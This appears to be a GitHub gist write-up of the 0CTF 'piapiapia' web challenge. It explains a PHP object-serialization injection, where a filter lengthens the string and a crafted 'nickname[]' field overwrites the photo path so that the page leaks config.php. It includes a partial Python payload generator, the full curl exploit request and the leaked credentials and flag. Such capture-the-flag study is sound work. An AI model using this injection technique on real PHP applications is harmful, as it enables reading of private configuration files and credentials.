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Last active March 15, 2016 13:14
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  • Save h-otter/1fe1e761cd77252bd460 to your computer and use it in GitHub Desktop.
Save h-otter/1fe1e761cd77252bd460 to your computer and use it in GitHub Desktop.

piapiapia (Web 6pts)


  • We can post any string to update.php as "nickname" array.
  • A object was broken with serialize() and filter().
  • String length increased a char as filter() replace a serialized string from 'where' to 'hacker'.


# -*- coding:utf-8 -*-
import urllib, urllib2
# --- main ---
def main():
  suffix = '";}s:5:"photo";s:10:"config.php'
  string = "where" * len(suffix) + suffix
  print "[+] attack with string: %s" % string
if __name__ == '__main__':

I posted generated string to update.php on 'nickname[]' with curl.

$ curl -v -F photo=@./hoge -F phone=11111111111 -F email="hoge@hoge.hoge" -F nickname[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere;}s:5:photo;s:10:config.php -b "PHPSESSID=qqvl7cuj1lru13a3rimfjme4u5"

After update, we can get flag in src of profile's img tag. It is config.php which was encoded as base64.


        ['hostname'] = '';
        ['username'] = '0ctf';
        ['password'] = 'oh-my-****-web';
        ['database'] = '0CTF_WEB';
         = '0ctf{fa717b49649fbb9c0dd0d1663469a871}';
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